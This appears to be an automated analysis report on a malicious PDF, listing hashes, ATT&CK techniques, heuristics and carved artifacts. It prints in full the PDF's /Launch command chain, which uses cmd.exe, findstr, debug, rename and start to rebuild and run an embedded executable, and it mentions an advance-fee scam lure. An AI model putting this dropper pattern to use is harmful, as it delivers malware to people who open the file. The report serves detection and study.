PDF malware analysis — malicious · 370f7c9b76a04f0f

MALICIOUS

PDF

2.16 MB Created: 2009-06-17 08:28:24 -04:00 Authoring application: Acrobat PDFMaker 8.1 for Word (via Acrobat Distiller 8.1.0 (Windows))

MD5: 2beaf85bf6d6f3eaf7c1480106bbe290 SHA-1: 3ce0d5fe4ebc8610fb486aa8bfbf8ba3d6965734 SHA-256: 370f7c9b76a04f0ffcbfca518131653a7a10e53399db7ac15560af1bd4c181cd

160 Risk Score

Malware Insights

MITRE ATT&CK

T1059.003 Windows Command Shell T1204.002 Malicious File

The PDF file contains a critical PDF_LAUNCH heuristic firing, indicating an attempt to execute a command. The command identified is 'c:\windows\system32\cmd.exe /C findstr fuqkjqdhrj *.pdf > gplrd.src && debug < gplrd.src > out.txt && rename nyyqp.txt nyyqp.exe && start nyyqp.exe', which suggests the file is designed to process other PDF files, potentially to extract and execute malicious content. The SE_ADVANCE_FEE_SCAM_LURE heuristic further supports that the document's content is intended to deceive the user into performing an action that leads to malware execution.

Heuristics 4

Launch action critical PDF_LAUNCH

PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
/Launch action target: c:\\windows\\system32\\cmd.exe critical PDF_LAUNCH_COMMAND

PDF /Launch action specifies an executable target with parameters '/C findstr fuqkjqdhrj *.pdf > gplrd.src && debug < gplrd.src > out.txt && rename nyyqp.txt nyyqp.exe && start nyyqp.exe' — references a known-dangerous executable (cmd, PowerShell, etc.).
Advance-fee lottery/parcel scam lure high SE_ADVANCE_FEE_SCAM_LURE

Document contains lottery/beneficiary or prize language together with large-value draft/funds wording and parcel/courier delivery requirements. This is a classic advance-fee fraud document shape.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns#
- http://ns.adobe.com/xap/1.0/
- http://purl.org/dc/elements/1.1/
- http://ns.adobe.com/xap/1.0/mm/
- http://ns.adobe.com/pdf/1.3/
- http://ns.adobe.com/pdfx/1.3/
- http://ns.adobe.com/xap/1.0/g/img/
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
- http://ns.adobe.com/tiff/1.0/
- http://ns.adobe.com/exif/1.0/
- http://ns.adobe.com/photoshop/1.0/

Extracted artifacts 8

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`stream_102_off0014bbe4.bin` `2fd39c2b5fc5bccd096feb40c4e48270fb8940450b8a628ad5b4d1b95b01cfe4`	decompressed-pdf-stream	PDF FlateDecoded stream at offset 0x14BBE4	4194304 bytes
`icc_00_off0001f78f.icc` `2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e`	pdf-icc-profile	PDF ICC profile at offset 0x1F78F	3144 bytes
`icc_01_off0007e47c.icc` `3f6d674174f3804eb0dabdac90ae17486e898c5063a66f861c116ea033da8301`	pdf-icc-profile	PDF ICC profile at offset 0x7E47C	3144 bytes
`font_00_sfnt_off00012c17.bin` `7e80129f677131766bd80caf36d48d2110e7219bb052c31847778a2af28bfa9a`	pdf-font-stream	PDF embedded font (sfnt) at offset 0x12C17	23776 bytes
`font_01_sfnt_off0001a31e.bin` `81712040490068705e4bc97ae2a6b0366454629421792c1ce9dfbf7f91a19013`	pdf-font-stream	PDF embedded font (sfnt) at offset 0x1A31E	5884 bytes
`font_02_sfnt_off0005ad0d.bin` `229c0711dddf51101d227913ecadf86da1a971312e23a3622a35026e857d0240`	pdf-font-stream	PDF embedded font (sfnt) at offset 0x5AD0D	20220 bytes
`font_03_sfnt_off0006682d.bin` `0b2d8a023a8107b0184169ada4854df34ac93513b6b998174ddf6a3fe2cd0f17`	pdf-font-stream	PDF embedded font (sfnt) at offset 0x6682D	20860 bytes
`font_04_sfnt_off00075ffe.bin` `7ce500e55d2b12ef606eba085838407ccc3cc2991eb12ba75cabe3df22e2f293`	pdf-font-stream	PDF embedded font (sfnt) at offset 0x75FFE	18968 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.